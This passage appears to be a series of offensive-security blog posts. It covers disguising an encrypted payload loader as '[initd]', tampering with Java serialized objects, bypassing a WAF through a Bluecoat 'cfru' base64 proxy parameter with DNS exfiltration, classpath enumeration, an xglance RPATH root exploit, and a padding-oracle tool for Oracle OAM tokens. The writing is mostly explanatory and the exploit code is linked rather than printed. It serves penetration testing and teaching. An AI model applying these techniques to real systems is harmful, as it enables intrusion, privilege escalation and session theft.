$ netstat -tupan | grep 9876
tcp 0 0 0.0.0.0:9876 0.0.0.0:* LISTEN 19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well you now know should never trust the ps output! 🙂

Conclusion

What if somebody discovers the launcher binary and the encrypted ELF dynamic library in the filesystem? The encryption key is not known hence nobody could decrypt and execute our payload.

What if the offset and length of encrypted sections are entered incorrectly? This will lead most of the cases to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and  “GetProcAddress()”, these functions API do the same as “dlopen()” and “dlsyms()”.

That’s all for today!

Snafuz, snafuz!

Interactive modification of Java Serialized Objects with SerialTweaker

Today we release another Java tool from the Serially toolkit. This tool can be used for advanced Java Deserialization attacks, when existing gadget chains don’t work or when there is a whitelist mechanism in place (like LookAheadDeserialization). In that case we have to work with the classes that are in the whitelist and thus accepted by the application. Instead of sending a gadget chain containing classes not familiar in the application, the idea is to modify the existing serialized objects that are used by the application during normal operations.

WARNING! This tool will deserialize input that it is given. It is therefore vulnerable to deserialization attacks by definition. Please make sure the input you use is not malicious, and/or use the tool in an isolated sandboxed environment.

Example usage

The probability to achieve RCE this way is pretty small, however in this kind of attack something like an authorization bypass is much more likely. Let’s discuss an example on how to perform the Java serialized object modifcation. Imagine an object that contains information about a user. It may contain values like ID, username and references to an object that defines roles and permissions. If we spot this object in serialized form on the wire, we can feed it to SerialTweaker in the following way:

We feed the Base64-encoded version of the serialized object directly on the command line as argument of ‘-b’. SerialTweaker will decode it to a raw serialized object and analyze it via a customized implementation of ObjectInputStream. This customized version captures all classes which are inside the serialized object, so we can create a list of classes that are needed to perform deserialization. Note that in order to deserialize the object locally, the Java runtime must have the required classes in the classpath. Therefore we use the same technique as with EnumJavaLibs: we keep a local repository of jar files and dynamically load what is needed.

So once the analysis finished, SerialTweaker preloads the required libraries. The next step is to attempt deserialization. If it encounters a class that is present in multiple jar files, it will prompt the user to choose which library to load from. In our case, the classes are directly traceable to the jar file “UserDb.jar”, so no prompt is shown. The big integers following the class names are the SerialVersionUID’s of the class.

Modifying variables

When deserialized, the contents of class variables are printed. These are values which are normally encoded within the serialized object, and thus values that we can modify. Keep in mind that static and transient variables are not serialized by default. SerialTweaker will print them and allow you to modify them, because there can be implemented a writeObject() method in the class that does serialize them. But in the default case it will not work to modify these values because they are not serialized. A warning “(not serialized by default)” will be printed after the variable output to remind the user of this behavior.

In our example, the 3rd field of the User class is a reference to a Roles object. SerialTweaker recognizes references and will print nested classes. The Roles class contains a boolean variable, which we would like to change to true.

Next, the user is prompted if he wants to perform any modifications. We type the id of the field we want to change (3), and the new value for it (T, for true). SerialTweaker prints the modified version of the object to confirm the modification was successful. If we’re done making changes, the modified object is serialized and the Base64 output is printed to the user.

Modifying ViewState

An interesting subject of serialized object modification might be JSF viewstates. When configured to store state client side, JSF websites will ship back- and forward a serialized object with every request. It’s usually a large object containing information about the state of UI elements. Changing these values might give an attacker opportunity to bypass certain restrictions.

SerialTweaker has a special ‘viewstate mode’, which will grab and decrypt (with ‘-k’) the viewstate from a given URL. Use the ‘-v’ flag to supply the URL.

Evaluation

There are already existing tools out there that can modify serialized objects. The difference is that they work by modifying the serialized object directly, working on a much lower level. This method is error-prone, because the serialized object contains various length fields and references, which need to be updated accordingly. SerialTweaker can make much more advanced modifications, but it comes with a price. You need to have the classes in your classpath in order to be able to deserialize them. Modifying values inside custom classes is therefore not possible with this approach.

The local repository of jar files is expected in ~/.serially/jars and should be indexed by using JavaClassDB.py from the EnumJavaLibs project.

Download

The tool is released on our GitHub page.

How to hack a company by circumventing its WAF through the abuse of a different security appliance and win bug bounties

Hey, wait! What do bug bounties and network security appliances have in common? Usually nothing! On the contrary, the security appliances allow virtual patching practices and actively participate to reduce the number of bug bounties paid to researchers…but this is a reverse story: a bug bounty was paid to us thanks to a misconfigured security appliance. We are not going to reveal neither the name of the affected company (except it was a Fortune 500) nor the one of the vulnerable component. However, we will be talking about the technique used, because it is astonishingly of disarming simplicity.

The observation

All has begun by browsing what at that time we did not even know yet to be a valuable target, let us call it “https://targetdomain“. Almost by accident, we noticed that a subdomain responsible for the authentication on that website had exposed some CSS and Javascript resources attributable to a Java component well known to be vulnerable to RCE (Remote Code Execution).

The weird thing was that by browsing the affected endpoint (something like “https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload“) we received a HTTP 404 reply from the server, which made us suspect the presence of a Web Application Firewall. Why that particular endpoint should not be reachable if the resources decorating it (like .css and .js files) are? This clearly made us believe we were in front of a WAF. After a few more requests, all blocked, we confirmed some kind of WAF rule was indeed preventing us from reaching the target endpoint.

The “weird” thing

By browsing one of the applications hosted (i.e. https://targetdomain/appname) we are invited to authenticate to “https//auth.targetdomain“. During the authentication process, we notice another strange thing. At a certain moment we are redirected to a URL like:

https//targetdomain/?cfru=aHR0cHM6Ly90YXJnZXRkb21haW4vYXBwbmFtZQ==

with “aHR0cHM6Ly90YXJnZXRkb21haW4vYXBwbmFtZQ==” being clearly a base64-encoded string. The base64 payload, after decoding, showed to be nothing more that the URL we had originally requested access to before starting the authentication, that is “https://targetdomain/appname“.

But what actually that “cfru” parameter was? Some quick research online shows it is part of the Bluecoat web filtering technology, a notorious proxy server appliance. So, this told us a bit more about the remote infrastructure. The HTTP requests we send to the target cross at least one WAF device and a Bluecoat proxy server before reaching the front end web servers and application servers, like reconstructed below.

The idea

A light bulb has lit up on our head once we discovered that this “cfru” parameter was publicly accessible, namely no authentication to the portal was required to pass our payload to it. Therefore we started to base64-encode URLs of external domains under our control and feed the “cfru” parameter with these strings.  The hope was to trigger some kind of SSRF. What we got at the end was much better.

Unfortunately, at that specific moment in time, we did not receive back any HTTP requests. However, in our internet-exposed machines, we could see the DNS resolution process started from “targetdomain”. It seemed the TCP outgoing connections from target website were prohibited.  The only authorized thing was, as said, DNS traffic. Then instead of trying to trigger SSRF requests to external hosts we turned our attention to internal subdomains (https://auth.targetdomain, https://blog.targetdomain, https://www.targetdomain, etc…).

We start to base64-encode few of these URLs into the “cfru” parameter and almost immediately notice another weirdness. For some URLs we get a HTTP 302 redirect back. For some others we do not. In this latter case instead the HTTP body in the reply contains the HTML code of the requested resource, as if Bluecoat forwarded the request to the destination resource and returned its content back to us by acting as a web proxy. Most importantly, this behavior was observed also when we encoded in the “cfru” parameter the subdomain responsible for the authentication to the portal (https//auth.targetdomain), namely the one we believed was hosting a Java component vulnerable to RCE.

The turning point

Here was the turning point! We have made the following assumption. If the resource

https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload

is directly browsed, our HTTP request lands immediately to the WAF, where there is configured a rule that recognizes the malicious attempt (the malicious payload pointed to by “param“) and sends back a HTTP 404 error, in fact blocking the attack.

But what if we encode in base64 the URL

https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload

which produces the following base64 string

aHR0cHM6Ly9hdXRoLnRhcmdldGRvbWFpbi92dWxuZXJhYmxlX2VuZHBvaW50P3BhcmFtPW1hbGljaW91c19SQ0VfcGF5bG9hZA==

and pass it to the “cfru” parameter as follows?

https//targetdomain/?cfru=aHR0cHM6Ly9hdXRoLnRhcmdldGRvbWFpbi92dWxuZXJhYmxlX2VuZHBvaW50P3BhcmFtPW1hbGljaW91c19SQ0VfcGF5bG9hZA==

In our case:

  1. The request crossed the WAF which had nothing to complain.
  2. Then it arrived to the Bluecoat device that in turn base64-decoded the “cfru” parameter and issued a GET request toward the internal host https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload.
  3. This in turn triggered the vulnerability.

Bingo!

And bingo! We can see the output of our malicious payload (nothing more than the “hostname” command) exfiltrated via DNS (outgoing TCP connections to our host located in the internet were indeed blocked as already said previously).

Furthermore, we played a bit with our malicious payload in order to have the output of our injected commands returned directly as part of the HTTP headers in the server reply.

Conclusion

There are at least two mistakes that can be spot here:

  • The bluecoat device was behaving as a request “forwarder” instead of responding with a HTTP redirect as happened for other URLs (that would have caused the subsequent client requests to be caught and blocked by WAF).
  • There was no rule implemented at WAF level that base64-decoded the “cfru” parameter before passing it to the Bluecoat device, in order to analyze whether or not the request’s content matched with one of the blocking rules deployed in the WAF itself.

Good for us! We notified the vulnerability to the vendor straight away and they decided to recognize us a nice bug bounty!

The bottom line here is that virtual patching is ok if you need a bit of extra time before fixing a serious vulnerability. But if you use it in place of real patching, well it is only question of time before you will get hacked.

If you want to know more about similar exploitation techniques and other web hacking tricks, check out our Blackhat Las Vegas courses on August 1-2 August and 3-4 August 2020, because this will be one of the topics covered there.

Remote Java classpath enumeration with EnumJavaLibs

To discover a deserialization vulnerability is often pretty straightforward. When source code is available, it comes down to finding calls to readObject() and finding a way for user input to reach that function. In case we don’t have source code available, we can spot serialized objects on the wire by looking for binary blobs or base64 encoded objects (recognized by ‘rO0..’). The hard part comes with exploitation. Sure you can throw all exploits from ysoserial at it and hope for the best, but if it doesn’t work there are not much other things to try.

The big piece of information which is missing at this point, is information about the classpath of the remote application. If we know what libraries are loaded, we might be able to construct a gadget chain (or adjust the existing ysoserial exploit to match the version of the library on the remote application, for example). That’s where the idea of EnumJavaLibs comes from: just let it deserialize arbitrary objects from different (popular) 3rd party Java libraries. More specifically:

  1. Create a local database of the most common Java libraries
  2. For each of these libraries, find a class that is serializable
  3. Create an instance of this object, serialize it, and send it to the remote application
  4. If we get a ClassNotFoundException back, we know the library is not on the classpath

We have released the code of this project on GitHub, together with a tool that can build a database of libraries (JavaClassDB.py). You can download the pre-compiled version over here.

JMX/RMI

JMX/RMI is a perfect example where Java classpath enumeration can be done, as it meets the above conditions. When the endpoint is running a vulnerable Java version (that is, before JEP290 implementation), JMX/RMI endpoints are vulnerable by default (regardless whether authentication is required). This is because a JMX/RMI endpoint exposes the RMIServerImpl_Stub.newClient(Object o) function which deserializes any object provided (RMI functions that accept parameters of type Object should always be a red flag).

EnumJavaLibs has a specific ‘RMI’ mode which allows you to specify IP and port of the RMI service. It will then invoke the newClient() function for each serialized object from the jars in the database. Upon deserialization error, we get the full stacktrace back via RMI, so we can easily read whether the class was found or not – and conclude if the library is loaded in the classpath.

Web applications

Because the way to probe web applications is highly specific case to case, Enumjavalibs will not perform the HTTP requests for you. Instead, it will create a CSV file with (classname, base64_encoded_serialized_object) for you, which you can then use to build requests yourself. One way to do this would be to use Burp intruder.

Internals

The tool uses a few Java ‘tricks’ which I would like to give some more details about. The first one is dynamic loading of libraries. This is made a lot harder (but not impossible) since Java 11, which is why the tool should be compiled with Java 8. Using URLClassLoader.addUrl(), it is possible to load a jar file specified by its path. Because this function is not exposed by the JDK, reflection is required to make it accessible.

Once we load the jar, we go through all its classes one-by-one, and try to serialize them. It doesn’t matter to us which class, all we want is some class from the jar file. If the remote server is able to deserialize this class, there’s a high probability the library it comes from is loaded. But how do we serialize an arbitrary class from a jar file? Normally serialization happens as follows:

  1. Instantiate an object of the class with ‘new …’
  2. Serialize the object using ObjectOutputStream

To instantiate the object, we need information about its constructors though. We could get that via reflection, but what if it has a constructor that takes as argument another object? Or what if some conditions need to be met for these arguments, or otherwise the constructor will throw an exception? This results in a complex situation, which is hard to handle automatically. Fortunately, there is a way to instantiate objects without invoking constructors. And it’s not pretty. But it works.

It’s called the Unsafe class and it let’s you do things that Java would normally forbid you to (for good reasons). One of them being instantiating classes without invoking the constructor. This works for our purposes, because at the remote side the ClassNotFoundException is thrown based on the name of the class – we don’t actually care about it being initialized properly. So after instantiation via Unsafe, we can serialize the object and – depending how you run the tool – send it off over RMI or store the Base64 encoded version in the output file.

False positives

It might happen that the class which is deserialized at the remote server, could actually be traced back to multiple libraries. Recall that we distinguish classes based on the combination of FQDN and SerialVersionUID. So when the serializable class doesn’t specify a custom SerialVersionUID in the source code, it is not unthinkable that a collision occurs (which means FQDN is the same). But even in this case we can still be pretty sure about which library is used – just not the exact version. Take for example the FQDN “org.apache.commons.fileupload.DiskFileUpload”; we can be pretty sure it comes from the commons-fileupload library, even though we might be unable to identify the exact version because the SerialVersionUID is the same between different versions.

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Privilege Escalation via HP xglance using perf-exploiter

In one of our recent penetration tests we have abused a vulnerability affecting a suid binary called “xglance-bin“. Part of HP Performance Monitoring solution, it allowed us to escalate our local unprivileged sessions on some Linux RHEL 7.x/8.x systems to root. To be very honest, it was not the first time we leveraged that specific vulnerability as we abused it frequently on many HP servers with RHEL installed since 2014.

There has been indeed a CVE registered for the flaw (CVE-2014-2630) originally discovered by Tim Brown from Portcullis. However the description for it was a bit criptic (aka completely useless) -> “Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors“. Unspecified vulnerability? Unknown vector? Well… up to today, there is no trace in the internet of a public exploit. Hence the idea to release our code.

Short description

Linux applications use shared libraries (.so extension) which are a bit like DLLs in Windows applications. An ELF binary needs to know where these .so libraries are stored, so it could load them when it is being executed.

There are several methods for specifying the location of dynamic libraries:

  1. Using “rpath” or “--rpath-link” options when compiling the application.
  2. Using the environment variable LD_RUN_PATH.
  3. Using the environment variable LD_LIBRARY_PATH.
  4. Using the value of DT_RUNPATH or DT_PATH, set with “rpath” option.
  5. Putting libraries into default /lib and /usr/lib directories.
  6. Specifying a directory containing libraries in /etc/ld.so.conf.

The objective of an attacker would be to control one of methods above in order to replace an existing dynamic library by a malicious one. This is the context of the vulnerability we exploited. Specifically we took advantage of case 1.

$ objdump -x xglance-bin | grep RPATH
RPATH -L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64

Indeed, as the “objdump” output clearly showed, the RPATH method was used to specify the location of dynamic libraries for the binary. Unfortunately one of those folders is pointing to a relative path. We can simply create the directory “-L/lib64”, put inside there a malicious library named as one of those xglance-bin loads…

$ ldd /opt/perf/bin/xglance-bin
[...]
libnums.so => -L/lib64/libnums.so (0x00007f0fb2b92000)
libXm.so.3 => -L/lib64/libXm.so.3 (0x00007f0fb2990000)
[...]

…and then launch the binary “/opt/perf/bin/xglance-bin” to escalate to root. The code can be downloaded from github and it is quite self-explanatory.  Just make the bash script executable, run it and it will perform all the exploitation steps for you. It needs the presence of a compiler in the target machine. Alternatively the library can be compiled in a compatible local system and then copied manually to the remote one.

Probably one word should be spent about symbols declared in the code itself that make it very big. This was due to some libraries that “xglance-bin” was trying to load but that were missing in the system we exploited. Instead of copying the absent libraries we just declared all the missing symbols in our code (nm, grep and cut are always your friends). Your environment could be different and not require that.

OAMBuster – Multithreaded exploit for CVE-2018-2879

Oracle OAM is a widely used component that handles authentication for many web applications. Any request to a protected resource on the web application redirects to OAM, acting as middleware to perform user authentication.

Last year, a vulnerability was found in the login process which contains a serious cryptographic flaw. It can be exploited to:

  • Steal a session token
  • Create a session token for any user

Basically it allows to login to the website and impersonate any user. Bad stuff.

Technical Details

During login, Oracle OAM will send a value called encquery as part of the URL. This parameter contains some values like a salt and a timestamp, and is encrypted with AES-CBC. However:

  • There is no HMAC attached, to verify that the encrypted string wasn’t tampered with
  • The website responds with an error message when there is a padding error during decryption

This makes it vulnerable to a classic Padding Oracle Attack.

However, there is one extra challenge: We can not just add blocks of data to the end of the string because the decrypted value contains a validation hash at the end. When adding a block (that turns into gibberish when decrypted), the hash won’t be valid and we will not be able to use the oracle – it simply will always provide an error.

The fix to this problem is simple: we first have to search for the character that turns into a space (0x20) when decrypted. Now the hash will be untouched, and the gibberish we place behind it is interpreted as a new value.

For more in depth information, please read these excellent blog posts by SEC Consult:

Exploit

There have been exploits in the wild for some time, but they are single threaded. Because this attack requires to guess byte values one by one, it can take about 4 hours to complete (without rate limiting).

With RedTimmy, we have developed a multithreaded version of the exploit called OAMBuster. Source code is available on GitHub.

OAMBuster is able to perform the following actions:

  • Verify if the target is vulnerable to the attack (<30 seconds)
  • Decrypt the encquery string, using POA
  • Decrypt any given string, using POA
  • Encrypt any given string, using POA

The final two functions can be used for example to decrypt the OAMAuthnCookie containing the session token, and then re-encrypt it.

Benefits of the multithreaded implementation

Because OAMBuster has multiple threads running, it can decrypt multiple blocks at the same time. So for example, when there are 16 blocks in total, the tool can run 16 threads on the last byte of each block. When a thread is finished, it continues to work on the second-to-last byte of the block, and so forth, working from back to front. Bytes within a block can not be parallelized, as they are dependent on each other.

Worthless to say, you can subscribe our blackhat course if you want to play with it more:

Links

https://github.com/redtimmy/OAMBuster